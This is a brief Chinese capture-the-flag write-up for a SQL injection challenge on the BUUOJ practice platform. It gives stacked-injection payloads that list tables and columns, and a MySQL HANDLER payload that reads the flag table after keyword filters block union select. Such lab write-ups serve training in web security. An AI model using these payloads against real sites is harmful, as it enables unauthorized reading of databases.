题目地址:https://buuoj.cn/challenges
解题思路
第一步:进入题目,看到输入栏,猜测使用sql注入
第二步:使用order by,union select,updata获取回显字段,发现被拦截
第三步:尝试堆叠注入,输入1';show tables#发现提示flag
第四步:输入1';show columns from FlagHere;#查看FlagHere字段发现flag
第五步:获取flag
由于本次屏蔽的关键字很多,所以解锁新姿势使用HANDLER
输入1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;#查看FlagHere的第一数据
